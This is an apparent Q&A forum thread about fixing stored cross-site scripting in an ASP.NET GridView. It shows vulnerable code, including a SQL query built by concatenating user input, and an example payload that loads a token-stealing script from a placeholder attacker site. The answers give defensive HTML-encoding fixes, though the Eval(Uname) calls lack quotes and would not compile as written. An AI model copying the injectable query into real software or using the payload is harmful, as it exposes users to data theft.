# How to overcome stored cross site scripting vulnerability in Asp.net c#

Tags: c#, asp.net, gridview, eval, xss

The part of the code am working on is vulnerable to stored XSS. Below is the code.

```
    <asp:GridView ID="GridView1" runat="server" AutoGenerateColumns="False"     OnRowCancelingEdit="GridView1_RowCancelingEdit"    
            OnRowEditing="GridView1_RowEditing"  OnRowUpdating="GridView1_RowUpdating" OnRowDeleting="GridView1_OnRowDeleting"  OnPageIndexChanging="GridView1_PageIndexChanging"  Width ="1000px" class="grid">


       <Columns>   

            <asp:TemplateField HeaderText="User Name">   
                <ItemTemplate>   
                    <asp:Label ID="lbl_Name" runat="server" Text='<%#Eval("Uname") %>'></asp:Label>   
                </ItemTemplate>   
                <EditItemTemplate>   
                    <asp:TextBox ID="txt_Name" runat="server" Text='<%#Eval("Uname") %>'></asp:TextBox>   //this is the line vulnerable to XSS
                </EditItemTemplate>   
            </asp:TemplateField>       </columns>
</asp:GridView>
```

code behind

```
  DataTable dt = new DataTable();
        try
        {
            SqlConnection con = new SqlConnection(conn);
            con.Open();
            SqlDataAdapter adapt = new SqlDataAdapter("Select Uid,Uname,Utype,Uemail,ClientName,ProjectName,Ulog from usrtable where ClientName='" + clientname + "' and Utype='Admin' or ClientName='" + clientname + "'and Utype='Normal'", con);
            **adapt.Fill(dt);**//this is again vulnerable
            con.Close();
        }  

 if (dt.Rows.Count > 0)
                {
                    GridView1.DataSource = dt;
                    GridView1.DataBind();
                }
```

Am not familiar with XSS. I went through lot of documents. It asks us to encode the data. But in my case how do I proceed.i have many labels and textboxes as item templates in GV. using this to update the table rows.

Comment: Need codebehind.

Comment: I have edited. please check the source code

Answer (score 0):

You are using Inline query with appending parameter to query.

Check below link for SQL Injection:

https://www.w3schools.com/sql/sql_injection.asp

Also Check below tag in web.config

```
<system.web>
  <pages buffer="true" validateRequest="true" />
</system.web>
```

Answer (score 0):

Stored XSS can harm your application users through ways like covertly posting User's sessionIds or tokens to the Attacker's site.

Example : `<script src=”http://wrongsite.com/tokenstealer.js”> </script>`

You can prevent it:

```
 <EditItemTemplate>   
                  <asp:TextBox ID="txt_Name" runat="server" Text='<%#Microsoft.Security.Application.Encoder.HtmlEncode(Eval(Uname).ToString()) %>'></asp:TextBox>   //this should protect from Stored XSS
 </EditItemTemplate>
```

In case your .net framework version is 4.5 or later use

```
System.Web.Security.AntiXss.AntiXssEncoder.HtmlEncode();
```

Answer (score 0):

You can prevent it in this way:

```
Text='<%#System.Web.HttpUtility.HtmlEncode(Eval(Uname).ToString())%>'
```